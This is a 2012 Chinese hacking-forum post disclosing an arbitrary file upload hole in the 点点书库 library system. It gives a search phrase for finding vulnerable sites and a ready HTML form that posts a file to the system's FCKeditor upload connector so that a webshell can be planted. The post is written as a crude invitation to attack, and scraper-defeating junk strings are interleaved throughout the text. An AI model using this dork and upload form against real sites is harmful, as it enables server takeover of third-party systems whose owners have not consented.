中国网络渗透测试联盟
标题:
点点书库图书馆系统文件上传漏洞
[打印本页]
作者:
admin
时间:
2012-9-10 21:20
标题:
点点书库图书馆系统文件上传漏洞
主题:图书馆系统任意文件上传漏洞
# t( X5 R: H& \* I
作者:冰锋刺客
- I8 m5 ~1 s0 F+ M( B, `; r
厂商:点击书(dianjishu.com)
3 ~- ?% E% _" }0 [5 I5 v8 y0 W" g
日期:2012-6-21
- I4 X! Q+ q; k0 Q- Z" C1 G
- h5 T" _6 F6 j- X: B7 ]. A2 a) b6 g% Q
I 概述
9 x e+ M r( C7 O) V) `
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
' s! E a- J, R+ `
II 简介
: q+ N: ]4 j# ~7 D
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
% Y. Z- Q8 }# T
补充一个漏洞
1 w1 H% c/ r6 u
<form id="frmUpload" enctype="multipart/form-data"
h7 g/ V8 c2 r3 L6 w U
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
) r% S" Y9 w: Q3 q
<input id="btnUpload" type="submit" value="操翻他">
; Z- }7 k/ p4 D% }, K
</form>
4 x7 ]0 M/ d, X2 L. ^/ ^/ K/ j
你们懂的
. y( o( [/ |9 l C7 n0 `0 ]
那傻逼提供还需要改包.
& ?) ]- T0 A# p, v! [
自己看了下源代码发现fckeditor
3 s. A! ~ ^, p: p% {. |0 Q5 Q
直接秒杀
& P" g8 M5 r4 v* M `$ L* ?
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2